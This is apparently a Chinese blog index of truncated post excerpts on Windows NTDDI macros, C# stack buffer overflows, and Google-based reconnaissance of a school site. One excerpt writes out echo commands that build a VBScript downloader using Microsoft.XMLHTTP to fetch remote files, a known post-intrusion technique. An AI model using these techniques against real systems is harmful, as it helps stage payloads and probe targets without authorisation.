摘要:
#define SUBVERSION_MASK 0x000000FF//// macros to extract various version fields from the NTDDI version//#define OSVER(Version) ((Version) &OSVERSION_MASK)#define SPVER(Version) (((Version) &SPVERSION_MASK) >>8)#define SUBVER(Version) (((Version) &SUBVERSION_MASK) )//#define NTDDI_V 阅读全文
摘要:
1.文件下载(无回显) echo iLocal = LCase(WScript.Arguments(1)) >iget.vbe echo iRemote = LCase(WScript.Arguments(0)) >>iget.vbe echo Set xPost = createObject("Microsoft.XMLHTTP") >>iget.vbe echo xPost.Open "GET",iRemote,0 >>iget.vbe echo xPost.Send() >>iget.vbe e 阅读全文
摘要:
IE对黑客利用“缓冲区溢出”、0day漏洞攻击的新闻,是否有过自己也想试试身手,可惜无从下手的感慨?本文将完全使用C#语言,探索那些不为人知的秘密。1.本文讲述在C#中利用堆栈缓冲区溢出动态修改内存,达到改变应用程序执行流程的目的。2.如果你是高手,请指出本文的不足。3.为了让本文通俗易懂,代码将极尽精简。现在开始我们知道,当数组下标越界时,.NET会自动抛出StackOverflowException,这样便让我们可以安全的读写内存,那么我们有没有逾越这个自动检测的屏障,达到我们非常操作的目的呢?答案是有的,而且我们可以修改一些关键变量如if、switch的判断值,for循环变量i值,甚至方 阅读全文
摘要:
用google完全是可以对一个站点进行信息收集和渗透的,下面我们用google对特定站点进行一次测试。 ------------------------------------------------首先用google先看这个站点的一些基本情况(一些细节部分就略去了): site:xxxx.com 从返回的信息中,找到几个该校的几个系院的域名: http//a1.xxxx.comhttp//a2.xxxx.comhttp//a3.xxxx.comhttp//a4.xxxx.com顺便ping了一下,应该是在不同的服务器.学校一般都会有不少好的资料,先看看有什么好东西没 site:xxxx.co 阅读全文